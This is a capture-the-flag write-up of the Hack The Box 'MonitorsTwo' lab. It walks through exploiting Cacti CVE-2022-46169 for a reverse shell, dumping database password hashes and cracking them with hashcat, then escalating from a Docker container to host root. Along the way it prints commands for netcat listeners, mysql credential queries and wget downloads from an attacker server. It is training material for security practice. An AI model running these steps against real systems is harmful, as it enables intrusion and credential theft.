Monitors Two Machine - Hack The Box - Writeup

Recon

First we launch an nmap scan that lists the open ports on the machine, initially we will do it by TCP and we will export the file in a format that can be filtered by regex to speed up the search a bit when filtering by grep.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.211 -oG allPorts

Pasted image 20230503215514.png

We get two open ports, but we need more information about these ports, we are going to launch some basic reconnaissance scripts to find out the version and name of the service running on these ports:

nmap -sCV -p22,80 10.10.11.211 -oN targeted

Pasted image 20230503215832.png

We note that we have SSH, but for now we will discard it since we do not have access credentials, we will focus on port 80 and open it in a browser to see what the page shows us.

Enumeration

Pasted image 20230503220018.png

It shows us a login page, we can try some simple SQL injections to see if they have an effect:

Pasted image 20230503220109.png

It seems to have no effect, we can also try common credentials like admin:admin, root:root, guest:guest

Pasted image 20230503220339.png

But none have an effect.

Cacti

Let's google about Cacti, Cacti is a complete graphing, network monitoring and data collection solution that harnesses the power of RRDtool. With the Cacti tool you can poll services at predetermined intervals and graph the resulting data. Its main function is to help you manage the performance of the equipment on your network.

Once we know what is cacti, we can look for specific vulnerabilities in the version used on the website:

We note that there is a vulnerability that allows command injection without authentication CVE-2022-46169, for this there are two ways, the first one is through the metasploit framework that makes the attack a bit easier and the second way is through a Python script that gives us the same result but in a slightly more traditional way.

Exploit

We will download the following repository on our attacking machine Repo

Within this script we will modify the host, the ip address of the victim machine and the port, we can also modify the payload, but the one that comes by default works wonderfully:
Pasted image 20230503221039.png

We execute the script:

Pasted image 20230503221137.png

And with netcat we listen on port 1234

nc -lvnp 1234

Pasted image 20230503221225.png

Navigating to the root of the machine we find an interesting entrypoint.sh file:

Pasted image 20230503221325.png

Let's read what's inside it:

Pasted image 20230503221415.png

There are database credentials, let's list all the tables inside the database:

mysql --host=db --user=root --password=root cacti -e "show tables"

Pasted image 20230503221648.png

Let's list the records in the table:

mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

Pasted image 20230503221846.png

We can see that there is a field called password, let's filter only the hashes for a better order of the data:

mysql --host=db --user=root --password=root cacti -e "select password from user_auth"

Pasted image 20230503222644.png

In total we have 3 hashes, we can try to decode them with haschat as follows:

hashcat -m 3200 -a 0 passMarcus.txt /usr/share/wordlists/rockyou.txt

in a few minutes we will have the hash of marcus:

Pasted image 20230503223100.png

Let's write this password down somewhere and remember the other open ports on the machine:

User Flag

Let's remember that we had port 22 open, let's try to enter these credentials to see if it connects us successfully:

Pasted image 20230503223240.png

And we have a connection, let's look for the flag:

Pasted image 20230503223310.png

Root Flag

If we are curious about the ssh notifications mentioning that we had mail, let's check it:

Pasted image 20230503223430.png

We are mentioned 3 vulnerabilities, if we pay attention the last one refers to a container, so we can execute lines both in the host machine and in the container in search of escalating privileges:

We open an http server with python:

python3 -m http.server 80

Pasted image 20230503223701.png

And with wget we download the content:

wget http://10.10.14.128/linpeas.sh

Pasted image 20230503223757.png

You can download linpeas from the official repository Download Here

We will follow the same procedure in the container:

Privilege Escalation on Docker

Pasted image 20230503224150.png

We found a critical vulnerability in the container, if we look at gftobins capsh gives us a series of commands that we can try to run a terminal as root:

capsh --gid=0 --uid=0 --

Pasted image 20230503224508.png

Well we escalate privileges in the container, but what next?

If we thoroughly explore the Docker vulnerability, If we have privileged access in the container and access to the container host, we can escalate privileges within the host explained in depth in this [blog](https://www.cyberark.com/resources/ threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure)

So first we will find the docker mount point:

findmn

Pasted image 20230503225031.png

and navigate to the path, we need to create a C binary, as follows:

Pasted image 20230503225202.png

And we get it through wget and our python server and build the binary:

Pasted image 20230503225344.png

We assign permissions with capabilities to the binary:

Pasted image 20230503225529.png

Now we only have to execute the created binary:

Pasted image 20230503225706.png

and surprise whoami:

Pasted image 20230503225734.png

We get the root flag:

Pasted image 20230503225758.png

And congratulations you have hacked the monitors two machine.